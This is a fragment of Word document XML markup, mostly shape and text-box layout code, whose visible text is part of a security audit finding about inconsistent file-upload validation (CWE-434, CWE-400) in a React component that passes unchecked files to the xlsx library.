                            <w:p w14:paraId="309B7638" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>accept=".xlsx,.xls,.csv"</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1960" name="Rectangle 1960"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1690390" y="1543050"/>
                            <a:ext cx="5729249" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="140D3EA9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> attribute looks like a control but is a file-picker hint, bypassed by drag-and-drop or</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1961" name="Rectangle 1961"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1714500"/>
                            <a:ext cx="3535510" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="678EF055" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">renaming. Arbitrary bytes of arbitrary size reached </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1962" name="Shape 1962"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2657475" y="1705657"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688431" y="0"/>
                                  <a:pt x="690676" y="930"/>
                                  <a:pt x="692535" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695325" y="6883"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126454"/>
                                  <a:pt x="694395" y="128699"/>
                                  <a:pt x="692535" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690676" y="132420"/>
                                  <a:pt x="688431" y="133350"/>
                                  <a:pt x="685800" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6883"/>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63" name="Rectangle 1963"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2685306" y="1729308"/>
                            <a:ext cx="852732" cy="140110"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="28D9F338" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>xlsx@0.18.5</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1964" name="Rectangle 1964"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3353544" y="1714500"/>
                            <a:ext cx="1306933" cy="148357"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="617AAE43" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> with its two CVEs.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="6887F1A9" id="Group 27424" o:spid="_x0000_s1270" style="width:510.25pt;height:144.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,18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KNSwoAAN9HAAAOAAAAZHJzL2Uyb0RvYy54bWzsXN2O2zYavV9g38Hw/WZIiqSoQSbFtmmC&#10;BRZt0XYfQKORxwZky5A1mUmffg9/JUpKIrdbe1ElFxlb/Pv4nY/k4SHl19+87KvVh7I57erD3Zq+&#10;IutVeSjqh93h8W79n1/f/UOtV6c2PzzkVX0o79Yfy9P6mzd//9vr5+NtyeptXT2UzQqVHE63z8e7&#10;9bZtj7c3N6diW+7z06v6WB6QuKmbfd7ia/N489Dkz6h9X90wQuTNc908HJu6KE8nPH1rE9dvTP2b&#10;TVm0P242p7JdVXdr2Naa/xvz/73+/+bN6/z2scmP213hzMh/hxX7fHdAo6Gqt3mbr56a3aiq/a5o&#10;6lO9aV8V9f6m3mx2RWn6gN5QMujN+6Z+Opq+PN4+Px6Dm+DagZ9+d7XFDx/eN8dfjj818MTz8RG+&#10;MN90X142zV7/hZWrF+Oyj8Fl5Uu7KvBQckUok+tVgTSqkoyQ1Dq12MLzo3LF9vsvlLzxDd9E5jwf&#10;ESCnzgenP+aDX7b5sTSuPd3CBz81q92D6QC6csj3iFSTY4UuSd0f3TzyBUedbk/w2Se9JIgQ3hGT&#10;rlKZSIQJv9Df/LZ4OrXvy9o4Pf/w71Nro/PBf8q3/lPxcvAfG8T4Z6P7mLe6nLZVf1w991Db3q2d&#10;JTp5X38of61NxlYjRzMCG1cedVja5agO/ZySy5SnPMrrcxRP97vi2/K3OH9KCKFdfthmmpQ8ZTyx&#10;jXLFbSiFJJ5K2wblguo0mBRX7xv1RVx0oguCJKY6FPGZ/N9xZpWRhBrgP5MdPXbmqCxRWeYM8rXG&#10;hvk2uu6pjCtp2uh1PnilC5AutfNxl/oFD3QQRkU+ZyOVglkvd0W8DZSTzKcNrac0lRa4yB2xG+Jv&#10;1ikZ1xMIIFIZyxLWxzxN4CGbRIUQ/SQhlGtNZan0zo/rj7/Z1pI0S2yVKs1U0q+ScZq6JJHBB2b4&#10;2VIION9aIlDBl2PPZU9lQvw49173f23VNqMFylbr0/3fgQlwtDCTbC82p3oaupNxGvUzuCBNPuFT&#10;OHd6fE21E0BK0tifAVjGSRToXah8ciBPNdRF32Bq6ELWrejOY6P5K661qOpTaV2uZ0YznYTZ0gys&#10;bj6uDnriBFZFDpqyqfLWrPf7XQv+Uu32mC2ZntNcZFQH1KYXDbtMmE/tx6rUk2t1+LncYL0xa6p+&#10;cGoe77+rmtWHXLMU889UnlfHbe6eunpdVmOqqUeX3+yqKlRJTdGoSkrYt9zPZi6zLlcaghRKEluy&#10;cNZYlgSugU57rgSnhEKm5frQhvIHMDxjZq+3+uN9/fDR8AvjECzidjn981fzjMN0u5r/jFUyPzxW&#10;5YrqpwBdW3bGiu4Cyy/mQmGyw2RhaA9XSRiQnjQdGxs7K/3hbq1XaYupW9fhSZ9FO1LHS357qN8B&#10;Sj8JjCKofbl/cTzFoNk5d7Wtm99+BA/fVDXCFOu4+bTW1Byt69T1qvrXAawJLmn9h8Z/uPcfmrb6&#10;rjZc2drzz6e23uw0ETHgWSjdl4siCa4wgaSZpGYjyTlVaUQ6PJx6Ss2Up7FXwNPM50vCk03iaRb/&#10;2XjShEmmR6FnqJid/O5CAWs9WyOJXgFP5acYO2L++uMTnGpifBraMR9PxUkKpjCBp0pTkl0PTkMv&#10;lzQ8QfIn4DSUeD6cGZGpnlT/74ZnFhjAUoanmMTTbKhm48k4o0yhpjGeYOZMb/+vNN1mgQcsBU+M&#10;qonxGVjhLGLLBJOK2O38kN5mMqHXo7dZ4AFLwRO+nsAzsMJZeILuYGQyKbEP1fSjY0MJ41Kl16ND&#10;VjBZ0vqJYw+Lp5ORofV5RjgLS4igIEMOUfBXL4t5fksp4dDa/YzLVGrmcuwq/Qb0YmJyMAViMuXG&#10;Eh17nVRsxZhMsN7SAUO7DAOdi0AbR3fCMoO8Pkes3ziVh2SKkF7+IFZSQpiT7TJoymZIuDKQRGC3&#10;HTCpXT7QTFx9/C0UTDI9kjDSuLQidK89iwnSpMoGipfDC2nGE3aTHzfhexmaCtXRJOmOC3y2uPBU&#10;IZGlhrn2LAzW00SxgcbZcwoWdGLl97luCa6mHBJLJNXSHkIuQvpY9PDuUkfN+l7bfoZoikr4PFOe&#10;ASI2RroS3i0A0iI6Np2l4Ioa7DMdouPNFBt52T8fYuOf94COu+E7Zx1gs/dCySfHhfqZhzHpbRzG&#10;cegzPsxXgYMTB0Mt+D0agAE/83QE9lKU2e/fvmPvFqnMYjM/QXjCPnvmIilVQi2BZSkNpzlhkUyw&#10;knQqENEzvp13/SLpJdg/R6XFURmaWxDt0dPoGFU8dW6YhWoiOMfCZ9fmCTJLM8mvqdViGVkYqpPa&#10;u+U+s8UDQRgjwopBU1sUyQnHmePVFISwdV7IjlNMCvB4es5QxSUXHNC7CXhiqKaCy3A56PIqfBb2&#10;z0sBdVKFF2eq8LjCheNMzV6lJPouCEKi0xKwaRAC21E7UhOSMRMzoHAXWlTDRnopoGJ8TSyqgVvM&#10;WlSxFfaggjJl0GojUBOp72r46fcKoAbitxRQsRedADVQi3NBBb4JHw1VmiZa5DCq/MVBxfVcv5gs&#10;BdRJVR6k55w1tTdScSuBq9FQTaWUuGx4NVSXdtai18KJoRq4xayharczVOBuq90OdQtqQoXiVztr&#10;YSRQvqWM0pE2LwKlmIUlSxR1WjYFPZLKeLADlHKeQpH2e5mravPelP+VNo9jCXaONs9xYXhSm+cc&#10;cW9HxUAwhPsE3oWw+/9zFEgUtKdcYK5DTTNgolntUJv3TkJaT1CNhVQvrzqZvVdkvjYfFRrqv33r&#10;J7T5nlPOlKJRcXD1WOBGakBorIzTHt5d6kiujZ0TtN2ohM8Tu9W6M2jEXYmv2rwZAMM4/qrNX+zW&#10;9GK1eTGpzePpOTSWST0bmxgG68EBtnsDIWjzCtpCd4P60to8I0EUWQjt0e/mjGksnp6DKpV4Mcqf&#10;iE6RWZEyvDnjdycXl/wYrjO5/iwF1klxHlLOObBaskVT/ZaTCYiOzCZ4T1EEEeEKgAZJZCmABmHe&#10;Xx2SYYc2b3siBd5MdHcdUpy52HdTOkglTkX1/sXKQr37Bl7AvdjVIW+J3p3YGy5/6OaQVHgn0May&#10;iWLw1M+zTgVmbJYoF/SOjep7y/akarA1kRnDcHA7k9TsGkdceJLfZhxH0Y7QJaac57feBWZfEr8+&#10;10uauS3plaDYpQJkzAJf8oKLBhiAF7m5cMqwd0UwHFd/teyECjvTgzcoZA1LEGb6I3gY73BwFrtf&#10;BVi6rVVos4O4Sxy16VG3nej2I3NvUXX7kVDCGxCuuYwND9z8TG/4ezhjD7t5eQSLf96DOA672AE2&#10;ey+GfHJcyHrLZpYqjkVvI5dx+IY+s/SM8RCcOBxf/o5WFBABPz+oY7O/3hXSP3MR3sL8673FKSdP&#10;NfH0HIqDq+4ice8WUZDUhLhp2G9IlGBpONbkl9+PhFOCpfCcyWNNXCY4B1WQF31dyG4zp+grpmKZ&#10;Ye9pyc4V6Gs4Jrg2rObnVPArMoYQuF+80T9T0/9uXuztfpfnzX8BAAD//wMAUEsDBBQABgAIAAAA&#10;IQAdjCkI3QAAAAYBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGb3U2kpcZsSinq&#10;qQi2gnibZqdJaHY2ZLdJ+u/detHLwOM93vsmX022FQP1vnGsIZkpEMSlMw1XGj73rw9LED4gG2wd&#10;k4YLeVgVtzc5ZsaN/EHDLlQilrDPUEMdQpdJ6cuaLPqZ64ijd3S9xRBlX0nT4xjLbStTpRbSYsNx&#10;ocaONjWVp93ZangbcVw/Ji/D9nTcXL738/evbUJa399N62cQgabwF4YrfkSHIjId3JmNF62G+Ej4&#10;vVdPpWoO4qAhXT4tQBa5/I9f/AAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAoiNKNSwoA&#10;AN9HAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAdjCkI&#10;3QAAAAYBAAAPAAAAAAAAAAAAAAAAAKUMAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;rw0AAAAA&#10;">
                <v:shape id="Shape 1836" o:spid="_x0000_s1271" style="position:absolute;top:5055;width:64801;height:8953;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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nCBxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LFHopurGlElNXEaFQ6smoiLdxd0yC2dmQXTX+e7cgeJvH+5zJrLO1uFDrK8cKhoMEBLF2&#10;puJCwWb9009B+IBssHZMCm7kYTbtvUwwM+7KK7rkoRAxhH2GCsoQmkxKr0uy6AeuIY7c0bUWQ4Rt&#10;IU2L1xhua/mRJCNpseLYUGJDi5L0KT9bBfoPz14fV4f35W6cb2/p/lSsv5R6e+3m3yACdeEpfrh/&#10;TZyffo7g/5t4gpzeAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACiKcIHEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1451l6480126,5034r,885282l6474764,893899v-2334,967,-4763,1451,-7290,1451l19050,895350v-2526,,-4956,-484,-7290,-1451c9426,892932,7366,891555,5580,889769,3793,887983,2417,885924,1450,883593l,876300,,19050,1450,11757c2417,9413,3793,7355,5580,5581,7366,3783,9426,2406,11760,1451,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,895350"/>
                </v:shape>
                <v:rect id="Rectangle 1940" o:spid="_x0000_s1272" style="position:absolute;width:587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001E670A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>OWASP</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1941" o:spid="_x0000_s1273" style="position:absolute;left:4418;width:11760;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6E846088" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> A05/A06:2021 · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1942" o:spid="_x0000_s1274" style="position:absolute;left:13262;width:6841;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0957A7FF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>CWE-434</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1943" o:spid="_x0000_s1275" style="position:absolute;left:18407;width:877;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2DFF4703" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">, </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1944" o:spid="_x0000_s1276" style="position:absolute;left:19067;width:6842;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76A28892" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>CWE-400</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1945" o:spid="_x0000_s1277" style="position:absolute;left:24212;width:140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40F0187A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1946" o:spid="_x0000_s1278" style="position:absolute;left:25268;width:5963;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39E2D17E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>Medium</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1947" o:spid="_x0000_s1279" style="position:absolute;top:2667;width:32468;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7E5DE868" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Four upload paths disagreed about validation. </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1948" o:spid="_x0000_s1280" style="position:absolute;left:24384;top:2483;width:11049;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1104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1VlxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPsPkSdxYymjgq0smzokENcVxK5WY9qIxqmS0JV/jw9I3Gy95/c+7w6zH9REMbnABm5XBSji&#10;NljHnYH3t+ebDaiUkS0OgcnADyU47BdXO6xsuPCJpiZ3SkI4VWigz3mstE5tTx7TKozEon2G6DHL&#10;GjttI14k3A96XRT32qNjaehxpKee2q/m2xu4Sy/lpj7l5sOFcJzO9YPrymjM9XKuH0FlmvO/+e/6&#10;1Qr+thRc+UZG0PtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI1/VWXEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l1095375,v2630,,4875,930,6735,2791c1103970,4651,1104900,6896,1104900,9525r,123825c1104900,135979,1103970,138224,1102110,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1104900,142875"/>
                </v:shape>
                <v:rect id="Rectangle 1949" o:spid="_x0000_s1281" style="position:absolute;left:24683;top:2719;width:13953;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56850091" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>GrnAdjust.jsx:1223</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1950" o:spid="_x0000_s1282" style="position:absolute;left:35444;top:2667;width:19650;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391DD1BA" w14:textId="67030DAE" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> was the worst this is the </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1951" o:spid="_x0000_s1283" style="position:absolute;left:50220;top:2667;width:6405;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4FAF14D5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:i/>
                          </w:rPr>
                          <w:t>complete</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1952" o:spid="_x0000_s1284" style="position:absolute;left:55036;top:2667;width:7546;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5EE56E99" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> validation:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1953" o:spid="_x0000_s1285" style="position:absolute;left:1007;top:6605;width:2245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40E23D29" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">const file = </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>e.target</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>files</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>[</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>0];</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1954" o:spid="_x0000_s1286" style="position:absolute;left:1007;top:8319;width:3694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3D65B4DE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
